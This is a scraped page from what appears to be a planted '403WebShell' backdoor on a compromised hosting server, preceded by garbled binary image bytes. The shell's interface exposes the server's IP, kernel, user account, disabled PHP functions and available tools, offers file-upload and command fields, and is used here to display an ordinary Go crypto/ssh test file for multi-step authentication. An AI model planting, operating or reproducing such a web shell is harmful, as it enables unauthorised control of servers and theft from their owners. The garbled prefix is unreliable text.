JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.5  /  Your IP : 216.73.217.6
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/go/pkg/mod/golang.org/x/crypto@v0.31.0/ssh/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/go/pkg/mod/golang.org/x/crypto@v0.31.0/ssh/server_multi_auth_test.go
// Copyright 2024 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

package ssh

import (
	"bytes"
	"errors"
	"fmt"
	"strings"
	"testing"
)

func doClientServerAuth(t *testing.T, serverConfig *ServerConfig, clientConfig *ClientConfig) ([]error, error) {
	c1, c2, err := netPipe()
	if err != nil {
		t.Fatalf("netPipe: %v", err)
	}
	defer c1.Close()
	defer c2.Close()

	var serverAuthErrors []error

	serverConfig.AddHostKey(testSigners["rsa"])
	serverConfig.AuthLogCallback = func(conn ConnMetadata, method string, err error) {
		serverAuthErrors = append(serverAuthErrors, err)
	}
	go newServer(c1, serverConfig)
	c, _, _, err := NewClientConn(c2, "", clientConfig)
	if err == nil {
		c.Close()
	}
	return serverAuthErrors, err
}

func TestMultiStepAuth(t *testing.T) {
	// This user can login with password, public key or public key + password.
	username := "testuser"
	// This user can login with public key + password only.
	usernameSecondFactor := "testuser_second_factor"
	errPwdAuthFailed := errors.New("password auth failed")
	errWrongSequence := errors.New("wrong sequence")

	serverConfig := &ServerConfig{
		PasswordCallback: func(conn ConnMetadata, password []byte) (*Permissions, error) {
			if conn.User() == usernameSecondFactor {
				return nil, errWrongSequence
			}
			if conn.User() == username && string(password) == clientPassword {
				return nil, nil
			}
			return nil, errPwdAuthFailed
		},
		PublicKeyCallback: func(conn ConnMetadata, key PublicKey) (*Permissions, error) {
			if bytes.Equal(key.Marshal(), testPublicKeys["rsa"].Marshal()) {
				if conn.User() == usernameSecondFactor {
					return nil, &PartialSuccessError{
						Next: ServerAuthCallbacks{
							PasswordCallback: func(conn ConnMetadata, password []byte) (*Permissions, error) {
								if string(password) == clientPassword {
									return nil, nil
								}
								return nil, errPwdAuthFailed
							},
						},
					}
				}
				return nil, nil
			}
			return nil, fmt.Errorf("pubkey for %q not acceptable", conn.User())
		},
	}

	clientConfig := &ClientConfig{
		User: usernameSecondFactor,
		Auth: []AuthMethod{
			PublicKeys(testSigners["rsa"]),
			Password(clientPassword),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	serverAuthErrors, err := doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("client login error: %s", err)
	}

	// The error sequence is:
	// - no auth passed yet
	// - partial success
	// - nil
	if len(serverAuthErrors) != 3 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[1].(*PartialSuccessError); !ok {
		t.Fatalf("expected partial success error, got: %v", serverAuthErrors[1])
	}
	// Now test a wrong sequence.
	clientConfig.Auth = []AuthMethod{
		Password(clientPassword),
		PublicKeys(testSigners["rsa"]),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err == nil {
		t.Fatal("client login with wrong sequence must fail")
	}
	// The error sequence is:
	// - no auth passed yet
	// - wrong sequence
	// - partial success
	if len(serverAuthErrors) != 3 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if serverAuthErrors[1] != errWrongSequence {
		t.Fatal("server not returned wrong sequence")
	}
	if _, ok := serverAuthErrors[2].(*PartialSuccessError); !ok {
		t.Fatalf("expected partial success error, got: %v", serverAuthErrors[2])
	}
	// Now test using a correct sequence but a wrong password before the right
	// one.
	n := 0
	passwords := []string{"WRONG", "WRONG", clientPassword}
	clientConfig.Auth = []AuthMethod{
		PublicKeys(testSigners["rsa"]),
		RetryableAuthMethod(PasswordCallback(func() (string, error) {
			p := passwords[n]
			n++
			return p, nil
		}), 3),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("client login error: %s", err)
	}
	// The error sequence is:
	// - no auth passed yet
	// - partial success
	// - wrong password
	// - wrong password
	// - nil
	if len(serverAuthErrors) != 5 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[1].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}
	if serverAuthErrors[2] != errPwdAuthFailed {
		t.Fatal("server not returned password authentication failed")
	}
	if serverAuthErrors[3] != errPwdAuthFailed {
		t.Fatal("server not returned password authentication failed")
	}
	// Only password authentication should fail.
	clientConfig.Auth = []AuthMethod{
		Password(clientPassword),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err == nil {
		t.Fatal("client login with password only must fail")
	}
	// The error sequence is:
	// - no auth passed yet
	// - wrong sequence
	if len(serverAuthErrors) != 2 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if serverAuthErrors[1] != errWrongSequence {
		t.Fatal("server not returned wrong sequence")
	}

	// Only public key authentication should fail.
	clientConfig.Auth = []AuthMethod{
		PublicKeys(testSigners["rsa"]),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err == nil {
		t.Fatal("client login with public key only must fail")
	}
	// The error sequence is:
	// - no auth passed yet
	// - partial success
	if len(serverAuthErrors) != 2 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[1].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}

	// Public key and wrong password.
	clientConfig.Auth = []AuthMethod{
		PublicKeys(testSigners["rsa"]),
		Password("WRONG"),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err == nil {
		t.Fatal("client login with wrong password after public key must fail")
	}
	// The error sequence is:
	// - no auth passed yet
	// - partial success
	// - password auth failed
	if len(serverAuthErrors) != 3 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[1].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}
	if serverAuthErrors[2] != errPwdAuthFailed {
		t.Fatal("server not returned password authentication failed")
	}

	// Public key, public key again and then correct password. Public key
	// authentication is attempted only once because the partial success error
	// returns only "password" as the allowed authentication method.
	clientConfig.Auth = []AuthMethod{
		PublicKeys(testSigners["rsa"]),
		PublicKeys(testSigners["rsa"]),
		Password(clientPassword),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("client login error: %s", err)
	}
	// The error sequence is:
	// - no auth passed yet
	// - partial success
	// - nil
	if len(serverAuthErrors) != 3 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[1].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}

	// The unrestricted username can do anything
	clientConfig = &ClientConfig{
		User: username,
		Auth: []AuthMethod{
			PublicKeys(testSigners["rsa"]),
			Password(clientPassword),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	_, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("unrestricted client login error: %s", err)
	}

	clientConfig = &ClientConfig{
		User: username,
		Auth: []AuthMethod{
			PublicKeys(testSigners["rsa"]),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	_, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("unrestricted client login error: %s", err)
	}

	clientConfig = &ClientConfig{
		User: username,
		Auth: []AuthMethod{
			Password(clientPassword),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	_, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("unrestricted client login error: %s", err)
	}
}

func TestDynamicAuthCallbacks(t *testing.T) {
	user1 := "user1"
	user2 := "user2"
	errInvalidCredentials := errors.New("invalid credentials")

	serverConfig := &ServerConfig{
		NoClientAuth: true,
		NoClientAuthCallback: func(conn ConnMetadata) (*Permissions, error) {
			switch conn.User() {
			case user1:
				return nil, &PartialSuccessError{
					Next: ServerAuthCallbacks{
						PasswordCallback: func(conn ConnMetadata, password []byte) (*Permissions, error) {
							if conn.User() == user1 && string(password) == clientPassword {
								return nil, nil
							}
							return nil, errInvalidCredentials
						},
					},
				}
			case user2:
				return nil, &PartialSuccessError{
					Next: ServerAuthCallbacks{
						PublicKeyCallback: func(conn ConnMetadata, key PublicKey) (*Permissions, error) {
							if bytes.Equal(key.Marshal(), testPublicKeys["rsa"].Marshal()) {
								if conn.User() == user2 {
									return nil, nil
								}
							}
							return nil, errInvalidCredentials
						},
					},
				}
			default:
				return nil, errInvalidCredentials
			}
		},
	}

	clientConfig := &ClientConfig{
		User: user1,
		Auth: []AuthMethod{
			Password(clientPassword),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	serverAuthErrors, err := doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("client login error: %s", err)
	}
	// The error sequence is:
	// - partial success
	// - nil
	if len(serverAuthErrors) != 2 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[0].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}

	clientConfig = &ClientConfig{
		User: user2,
		Auth: []AuthMethod{
			PublicKeys(testSigners["rsa"]),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err != nil {
		t.Fatalf("client login error: %s", err)
	}
	// The error sequence is:
	// - partial success
	// - nil
	if len(serverAuthErrors) != 2 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[0].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}

	// user1 cannot login with public key
	clientConfig = &ClientConfig{
		User: user1,
		Auth: []AuthMethod{
			PublicKeys(testSigners["rsa"]),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err == nil {
		t.Fatal("user1 login with public key must fail")
	}
	if !strings.Contains(err.Error(), "no supported methods remain") {
		t.Errorf("got %v, expected 'no supported methods remain'", err)
	}
	if len(serverAuthErrors) != 1 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[0].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}
	// user2 cannot login with password
	clientConfig = &ClientConfig{
		User: user2,
		Auth: []AuthMethod{
			Password(clientPassword),
		},
		HostKeyCallback: InsecureIgnoreHostKey(),
	}

	serverAuthErrors, err = doClientServerAuth(t, serverConfig, clientConfig)
	if err == nil {
		t.Fatal("user2 login with password must fail")
	}
	if !strings.Contains(err.Error(), "no supported methods remain") {
		t.Errorf("got %v, expected 'no supported methods remain'", err)
	}
	if len(serverAuthErrors) != 1 {
		t.Fatalf("unexpected number of server auth errors: %v, errors: %+v", len(serverAuthErrors), serverAuthErrors)
	}
	if _, ok := serverAuthErrors[0].(*PartialSuccessError); !ok {
		t.Fatal("server not returned partial success")
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit